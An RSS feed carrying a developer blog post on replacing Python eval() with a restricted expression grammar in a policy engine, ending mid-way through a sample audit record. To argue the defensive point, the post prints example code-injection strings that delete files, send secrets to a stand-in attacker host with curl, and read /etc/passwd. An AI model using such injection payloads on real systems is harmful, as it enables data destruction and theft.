<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Aisha</title>
    <description>The latest articles on DEV Community by Aisha (@aisha_ow).</description>
    <link>https://dev.to/aisha_ow</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3949967%2Fbf0520a6-2209-41cd-b79d-58bd28f1ecf7.png</url>
      <title>DEV Community: Aisha</title>
      <link>https://dev.to/aisha_ow</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/aisha_ow"/>
    <language>en</language>
    <item>
      <title>Why I Didn't Use eval() in ObsidianWall's Policy Engine — And What I Built Instead</title>
      <dc:creator>Aisha</dc:creator>
      <pubDate>Mon, 25 May 2026 13:00:00 +0000</pubDate>
      <link>https://dev.to/aisha_ow/why-i-didnt-use-eval-in-obsidianwalls-policy-engine-and-what-i-built-instead-31kb</link>
      <guid>https://dev.to/aisha_ow/why-i-didnt-use-eval-in-obsidianwalls-policy-engine-and-what-i-built-instead-31kb</guid>
      <description>&lt;p&gt;&lt;em&gt;Published by Aisha · ObsidianWall&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;When you're building a tool that evaluates policy expressions like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;current_spend&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;estimated_cost&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;budget&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;amount&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;the obvious implementation is a single line of Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;expression&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It works. It's clean. It takes five minutes to write.&lt;/p&gt;

&lt;p&gt;I didn't use it. Here's exactly why — and what I built instead.&lt;/p&gt;




&lt;h2&gt;
  
  
  What ObsidianWall Is
&lt;/h2&gt;

&lt;p&gt;Before getting into the technical decision, some context.&lt;/p&gt;

&lt;p&gt;ObsidianWall is a &lt;strong&gt;programmable assurance platform&lt;/strong&gt; — a system for encoding human governance intent as executable policy, evaluating it deterministically, and enforcing it transparently with full audit traceability.&lt;/p&gt;

&lt;p&gt;The core doctrine of the platform is this:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;AI may advise. AI may explain. AI may optimize. AI may recommend.&lt;/em&gt;&lt;br&gt;
&lt;em&gt;AI may NOT authoritatively govern.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That single principle drives every architectural decision in the platform, including the one this article is about.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ObsidianWall Verdict&lt;/strong&gt; is the first executable built on that platform — a deterministic pre-deployment infrastructure governance engine. It evaluates infrastructure plans against policy before deployment happens, produces an enforcement decision, and generates an audit-grade trace of exactly how that decision was reached.&lt;/p&gt;

&lt;p&gt;The expression evaluator is at the heart of how Verdict makes those decisions. And that is where &lt;code&gt;eval()&lt;/code&gt; became the wrong answer.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Problem With eval() in a Governance Engine
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; executes arbitrary Python expressions. That sentence sounds harmless until you think carefully about what "arbitrary" means in the context of a system that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Accepts policy files written by humans&lt;/li&gt;
&lt;li&gt;Processes infrastructure plans from CI/CD pipelines&lt;/li&gt;
&lt;li&gt;Makes enforcement decisions that block or allow deployments&lt;/li&gt;
&lt;li&gt;Produces audit records that compliance teams rely on&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In that context, "arbitrary" means any of the following become valid inputs to your evaluator:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Someone writes this as a policy condition expression:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__import__(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;os&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).system(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;rm -rf /&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# Or this:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__import__(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;subprocess&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).call([&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;curl&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;, &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;http://attacker.com&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;, &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;-d&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;, secrets])&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# Or something subtler:
&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;open(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;/etc/passwd&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).read() == &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;root&lt;/span&gt;&lt;span class="sh"&gt;'"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; executes all of them without question.&lt;/p&gt;

&lt;p&gt;The standard advice is to sandbox it by removing builtins:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;expression&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__builtins__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{}},&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is not sufficient. Python's object model provides paths back to dangerous capabilities through class hierarchies even with builtins removed. Security researchers have broken every Python eval sandbox ever published. This is a fundamentally unsolved problem — not an engineering challenge you can outthink with a clever enough sandbox.&lt;/p&gt;

&lt;p&gt;But the security problem is not even the most important reason to reject &lt;code&gt;eval()&lt;/code&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Real Problem: Auditability
&lt;/h2&gt;

&lt;p&gt;A governance engine is not a calculator. It is a system that makes enforcement decisions about infrastructure and produces audit records that humans, compliance teams, and regulators rely on.&lt;/p&gt;

&lt;p&gt;For that system to be trustworthy, every decision must be:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Deterministic&lt;/strong&gt; — the same input always produces the same output, without exception&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auditable&lt;/strong&gt; — a human reading the trace can verify the decision independently without running any code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Bounded&lt;/strong&gt; — the complete set of things the evaluator can do is finite, known, and describable&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; fails all three requirements.&lt;/p&gt;

&lt;p&gt;It is non-deterministic by design — side effects, I/O, and state mutations are all possible. It is not auditable — you cannot fully describe its behavior surface without describing all of Python. It is unbounded — it can do anything Python can do.&lt;/p&gt;

&lt;p&gt;What a governance engine actually needs is not a Python expression evaluator. It needs a &lt;strong&gt;restricted expression grammar&lt;/strong&gt; — a purposefully small language that can only do exactly what policy evaluation requires, and nothing else. The restriction is not a limitation. It is the entire point.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Solution: A Deterministic Expression Grammar
&lt;/h2&gt;

&lt;p&gt;ObsidianWall Verdict's condition evaluator supports a deliberately minimal grammar:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Comparison operators:   &amp;lt;=   &amp;gt;=   &amp;lt;   &amp;gt;   ==
Arithmetic operations:  addition  ( a + b )
Operand types:          context keys,  numeric literals
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That is the complete grammar. No function calls. No variable assignment. No imports. No string manipulation. No loops. No conditionals beyond the comparison itself.&lt;/p&gt;

&lt;p&gt;If an expression requires anything outside this grammar, the evaluator does not attempt to execute it. It raises an error with a clear message. The boundary is explicit, enforced, and fully testable.&lt;/p&gt;

&lt;p&gt;This means a policy author can write:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;conditions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;budget_check&lt;/span&gt;
    &lt;span class="na"&gt;expression&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(current_spend&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;+&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;estimated_cost)&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;lt;=&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;budget.amount"&lt;/span&gt;
    &lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Monthly&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;spend&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;cap&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;enforcement"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And the evaluator resolves it step by step:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Strip cosmetic parentheses&lt;/li&gt;
&lt;li&gt;Identify the comparison operator — &lt;code&gt;&amp;lt;=&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Split into left side and right side&lt;/li&gt;
&lt;li&gt;Resolve left side — &lt;code&gt;current_spend + estimated_cost&lt;/code&gt; — by looking up each key in the runtime context and summing them&lt;/li&gt;
&lt;li&gt;Resolve right side — &lt;code&gt;budget.amount&lt;/code&gt; — by looking up the key in the runtime context&lt;/li&gt;
&lt;li&gt;Apply the operator — &lt;code&gt;100 &amp;lt;= 50.0&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Return the result — &lt;code&gt;False&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Every step is traceable. Every step is verifiable. A compliance engineer reading the audit output can reconstruct the evaluation manually without running any code. That is what auditability means in practice — not just logging that a decision happened, but making the decision itself independently verifiable.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Normalization Layer — Bridging Human Intent and Machine Evaluation
&lt;/h2&gt;

&lt;p&gt;There is an architectural subtlety that took real design work to get right.&lt;/p&gt;

&lt;p&gt;Governance policies are written by humans in nested, readable structures:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;parameters&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;budget&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;amount&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;50&lt;/span&gt;
      &lt;span class="na"&gt;period&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;monthly&lt;/span&gt;
      &lt;span class="na"&gt;owner&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;team-alpha&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But the deterministic evaluator operates against a flat key-value context. It resolves &lt;code&gt;budget.amount&lt;/code&gt; — not nested object traversal, not dynamic attribute access, not recursive dict walking.&lt;/p&gt;

&lt;p&gt;The naive solution is to make the evaluator smart about nested structures. That is the wrong solution. It contaminates the evaluator with policy structure knowledge, destroys its determinism guarantees, and makes it significantly harder to audit.&lt;/p&gt;

&lt;p&gt;The correct solution is a &lt;strong&gt;normalization layer&lt;/strong&gt; that runs before evaluation — a dedicated component whose only job is to translate human-readable nested policy structures into evaluator-ready flat contexts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;Input:&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"budget"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"amount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"period"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"monthly"&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;Output:&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"budget.amount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"budget.period"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"monthly"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After normalization, the evaluator receives a flat context. It resolves &lt;code&gt;budget.amount&lt;/code&gt; directly. It never needs to know how the policy was structured. The normalization layer is the bridge — and it is the only place in the system that understands both the policy structure and the evaluation context simultaneously.&lt;/p&gt;

&lt;p&gt;The evaluation pipeline becomes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Raw Policy YAML
      ↓
Canonicalize DSL structure
      ↓
Validate against schema contract
      ↓
Flatten + merge into runtime context     ← normalization layer
      ↓
Restricted expression evaluation         ← deterministic, bounded
      ↓
Decision + immutable audit trace
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each layer has one responsibility. Each layer can be tested independently. Each layer can be audited independently. No layer needs to understand what the others are doing internally.&lt;/p&gt;




&lt;h2&gt;
  
  
  What This Means for Testing
&lt;/h2&gt;

&lt;p&gt;Because the expression evaluator is a pure function with no side effects and a completely bounded input surface, testing it requires no mocking, no fixtures, and no infrastructure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_blocks_when_budget_exceeded&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;current_spend&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;estimated_cost&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mf"&gt;50.0&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;evaluate_expression&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(current_spend + estimated_cost) &amp;lt;= budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;context&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_allows_when_within_budget&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;current_spend&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;estimated_cost&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;30&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="mf"&gt;50.0&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;evaluate_expression&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(current_spend + estimated_cost) &amp;lt;= budget.amount&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;context&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;


&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_rejects_expression_outside_grammar&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;pytest&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;raises&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;ValueError&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nf"&gt;evaluate_expression&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__import__(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;os&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;).system(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ls&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;{}&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A function goes in. A result comes out. You assert the result. No setup. No teardown. No dependencies. That is what happens when you build a pure deterministic function instead of delegating to &lt;code&gt;eval()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;The third test is particularly important for a governance engine. The evaluator does not just fail silently on unsupported expressions — it explicitly rejects them. The boundary is enforced, not just hoped for.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Principle Behind the Decision
&lt;/h2&gt;

&lt;p&gt;The decision not to use &lt;code&gt;eval()&lt;/code&gt; is not primarily a security decision, though security is one outcome.&lt;/p&gt;

&lt;p&gt;It is a decision about what kind of system ObsidianWall is.&lt;/p&gt;

&lt;p&gt;The ObsidianWall doctrine says AI may advise but may not authoritatively govern. The same principle applies to the expression evaluator — it may evaluate exactly what the grammar allows, and nothing else. The restriction is the guarantee. The boundary is the trust.&lt;/p&gt;

&lt;p&gt;A governance engine is only useful if the people governed by it trust it. Trust requires transparency. Transparency requires that the system's behavior be fully describable — that an engineer, a compliance officer, or a regulator can read the evaluation trace and verify independently that the decision was correct.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;eval()&lt;/code&gt; cannot offer that guarantee. A restricted expression grammar can.&lt;/p&gt;

&lt;p&gt;The minimal grammar is not a limitation imposed by inability. It is a design statement:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This system does exactly this, and nothing else. You can verify that. We built it that way on purpose.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That is what programmable assurance means.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Audit Output
&lt;/h2&gt;

&lt;p&gt;When Verdict evaluates a plan and reaches a decision, the audit artifact looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"decision"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"DENY"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"conditions_passed"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"trace"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"condition_id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"budget_check"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"expression"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"(current_spend + estimated_cost) &amp;lt;= budget.amount"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"result"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"description"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Monthly spend cap enforcement"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"input_context"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"estimated_cost"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"current_spend"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"runtime_context"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"estimated_cost"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"current_spend"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
